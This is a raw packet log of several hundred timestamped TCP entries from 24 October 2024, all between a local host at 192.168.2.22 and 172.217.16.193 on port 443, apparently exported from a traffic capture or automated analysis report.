Oct 24, 2024 21:23:09.590171099 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.590280056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.590342999 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.590354919 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.590445995 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.590497971 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.590526104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.591222048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.591289997 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.591304064 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607345104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607415915 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.607429981 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607547998 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607611895 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.607624054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607711077 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.607772112 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.607784033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608108997 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608186007 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.608197927 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608289003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608351946 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.608362913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608457088 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608519077 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.608531952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.608964920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.609026909 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.609039068 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.644198895 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.644288063 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.644314051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677210093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677320957 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677319050 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.677354097 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677417040 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.677490950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677659988 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677725077 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.677742004 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677835941 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.677897930 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.677911997 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.678003073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.678066015 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.678077936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.678189993 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.678252935 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.678263903 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.695266008 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.695362091 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.695385933 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710021973 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710100889 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.710119963 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710216045 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710272074 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.710284948 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710371971 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710433960 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.710445881 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710532904 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710594893 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.710606098 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710696936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.710760117 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.710771084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.712394953 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.712470055 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.712481022 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.728941917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729034901 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729043961 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729099989 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729156971 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729175091 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729254007 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729309082 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729322910 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729412079 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729473114 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729485989 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729573965 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729640007 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729652882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729767084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.729830027 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.729842901 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.766361952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.766458988 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.766467094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.766521931 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.766613960 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.766632080 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800010920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800113916 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.800128937 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800235033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800333023 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800410986 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.800422907 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800484896 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800528049 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.800596952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800661087 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.800676107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800779104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.800843954 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.800858974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.815190077 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.815229893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.815263033 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.815279007 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.815341949 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.830636024 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.830694914 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.830725908 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.830760956 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.830779076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.830791950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.830828905 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.830847979 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831425905 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831461906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831486940 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.831504107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831564903 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.831578016 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831705093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.831764936 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.831778049 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.832977057 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.833036900 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.833050013 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869276047 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869343042 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869350910 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869551897 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869591951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869604111 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869611979 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869647026 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869652033 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869661093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869704962 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869759083 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869853973 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869894981 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869909048 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869921923 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.869973898 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.869986057 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.887938976 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.887976885 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.888012886 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.888089895 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.888123989 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.888123989 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.888159037 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.888216019 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.920557976 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920751095 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920799971 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920826912 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.920859098 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920913935 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920913935 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.920928001 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.920974016 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.920981884 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.921447039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.921489954 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.921506882 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.921520948 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.921581030 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.936711073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950372934 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950411081 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950443029 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950449944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.950465918 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950509071 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.950659990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950696945 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950720072 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.950735092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.950793028 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.951054096 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951159000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951193094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951217890 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.951231956 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951289892 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.951334000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951392889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951437950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951448917 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.951462030 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.951517105 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.953099012 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989020109 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989065886 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989101887 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989130020 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989195108 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.989195108 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.989229918 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989279032 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.989288092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989748955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989797115 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989799976 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.989814997 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.989869118 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.989891052 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.990025043 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.990061998 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:09.990158081 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:09.990174055 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008198023 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008239985 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008272886 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008306980 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008351088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.008351088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.008383036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.008435965 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.040572882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.040666103 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.040705919 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.040726900 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.040745974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.040811062 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.040824890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.041095018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.041136026 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.041157007 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.041172028 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.041230917 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.041459084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.057012081 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.057054996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.057164907 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.057198048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.057250023 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.070354939 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070502996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070559978 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.070576906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070661068 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070702076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070715904 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.070730925 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.070780039 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.070792913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.071116924 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.071177006 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.071188927 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.109395027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.109427929 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.109540939 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.109540939 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.109575033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.127952099 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.127984047 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.128118992 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.128118992 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.128118992 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.128154039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.161539078 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.161570072 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.161629915 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.161642075 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.161657095 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.190941095 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.190970898 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.191010952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.191035032 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.191056013 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.191078901 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.191113949 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.228974104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.228986025 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.229036093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.229079962 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.229079962 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.229110003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.229130983 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.232700109 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.232738018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.232772112 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.232793093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.232821941 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.281001091 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.281069994 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.281127930 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.281199932 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.281238079 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.310694933 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.310772896 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.310791969 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.310813904 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.310852051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.310869932 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.310900927 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.312529087 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.312541962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.312580109 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.312588930 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.312598944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.312633038 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.312666893 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.351576090 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.351614952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.351672888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.351672888 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.351697922 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.351715088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.400293112 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.400336027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.400369883 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.400381088 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.400394917 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.417709112 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.417773008 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.417824984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.417958975 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.417958975 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:10.417969942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:10.431973934 CEST	443	49169	172.217.16.193	192.168.2.22
